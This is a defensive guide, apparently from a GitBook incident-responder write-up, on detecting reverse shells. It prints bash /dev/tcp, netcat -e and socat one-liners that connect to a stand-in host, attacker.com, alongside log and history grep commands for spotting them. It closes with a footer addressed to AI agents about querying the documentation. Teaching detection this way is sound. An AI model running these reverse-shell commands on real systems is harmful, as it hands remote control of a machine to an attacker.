# Reverse Shell

<figure><img src="https://1176031639-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FNQ7A82FmDjR05oHeIjks%2Fuploads%2FvWxFqXZWWhnIrvNtf2Nu%2Fimage.png?alt=media&#x26;token=9b0541c8-22aa-4a64-af3e-6751d49ba952" alt=""><figcaption></figcaption></figure>

## **Reverse Shell Detection and Analysis**

**Reverse shells** are a common tool in an attacker’s arsenal, enabling remote command execution on compromised systems. This guide explores methods used to establish reverse shells, detection strategies, and forensic analysis techniques.

***

## **Common Commands and Their Usage**

### **1. bash Command**

The **bash** command can establish reverse shells by leveraging `/dev/tcp` or `/dev/udp`.

**Example**:

```bash
export RHOST=attacker.com  
export RPORT=12345  
bash -c 'exec bash -i &>/dev/tcp/$RHOST/$RPORT <&1'
```

**Detection**:

* **Audit Logs**:

  ```bash
  cat /var/log/audit/audit.log | grep "bash" | egrep "udp|tcp"
  ```
* **Command History**:

  ```bash
  history | grep "bash" | egrep "udp|tcp"
  cat ~/.bash_history | grep "bash" | egrep "udp|tcp"
  ```
* **EDR/XDR Logs**:\
  Monitor for **bash process creation** or **network events** involving `/dev/tcp` or `/dev/udp`.

### **2. nc (Netcat) Command**

**Netcat** is a versatile utility often used for reverse shells.

**Example**:

```bash
RHOST=attacker.com  
RPORT=12345  
nc -e /bin/sh $RHOST $RPORT
```

**Detection**:

* Focus on **`-e`** or **`-l`** parameters.
* **Audit Logs**:

  ```bash
  cat /var/log/audit/audit.log | grep "nc" | grep "\-e"
  ```
* **Command History**:

  ```bash
  history | grep "nc" | grep "\-e"
  cat ~/.bash_history | grep "nc" | grep "\-e"
  ```
* **EDR/XDR Logs**:\
  Monitor **nc process creation** and check for unusual outbound connections.

### **3. socat Command**

**socat** offers more flexibility than **nc**, making it a preferred choice for advanced reverse shells.

**Example**:

```bash
RHOST=attacker.com  
RPORT=12345  
socat tcp-connect:$RHOST:$RPORT exec:/bin/sh,pty,stderr,setsid,sigint,sane
```

**Detection**:

* Investigate commands using **`exec`** and **`tcp-connect`**.
* **Audit Logs**:

  ```bash
  cat /var/log/audit/audit.log | grep "socat" | grep -i "exec"
  ```
* **Command History**:

  ```bash
  history | grep "socat" | grep -i "exec"
  cat ~/.bash_history | grep "socat" | grep -i "exec"
  ```
* **EDR/XDR Logs**:\
  Analyze **socat processes** for suspicious parameters and unexpected network activity.

***

## **General Detection Strategies**

### **1. Audit Logs**

Continuously monitor `/var/log/audit/audit.log` for specific commands and associated parameters:

* **Commands to Track**: `bash`, `nc`, `socat`
* **Example**:

  ```bash
  cat /var/log/audit/audit.log | grep [command]
  ```

### **2. Command History**

Regularly inspect command history files for traces of suspicious commands:

* **Interactive Sessions**:

  ```bash
  history | grep [command]
  ```
* **Persistent Logs**:

  ```bash
  cat ~/.bash_history | grep [command]
  ```

### **3. EDR/XDR Solutions**

Employ EDR or XDR tools to:

* **Track Process Creation**: Identify the origin of reverse shell tools.
* **Analyze Network Activity**: Monitor outbound connections, especially to uncommon ports or suspicious IP addresses.

### **4. Network Monitoring**

Set up alerts for:

* **Unusual Outbound Connections**: Look for high-frequency requests to external IPs.
* **Known Malicious Indicators**: Monitor outbound traffic to flagged domains or IPs.

***

## **Key Takeaways**

* **Reverse shells** exploit legitimate utilities like **bash**, **nc**, and **socat** for remote control.
* **Detection** relies on monitoring suspicious **process creation**, **command execution**, and **network connections**.
* **Forensic Analysis** requires correlating data from:
  * **Audit logs** (`/var/log/audit/audit.log`).
  * **Command histories** (`history` or `.bash_history`).
  * **EDR/XDR telemetry** for process and network activity.

By continuously monitoring system activity and analyzing logs for anomalies, defenders can effectively detect and respond to reverse shell threats.


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://karim-ashraf.gitbook.io/karim_ashraf_space/writeups/lets-defend/incident-responder-path/gtfobins/reverse-shell.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.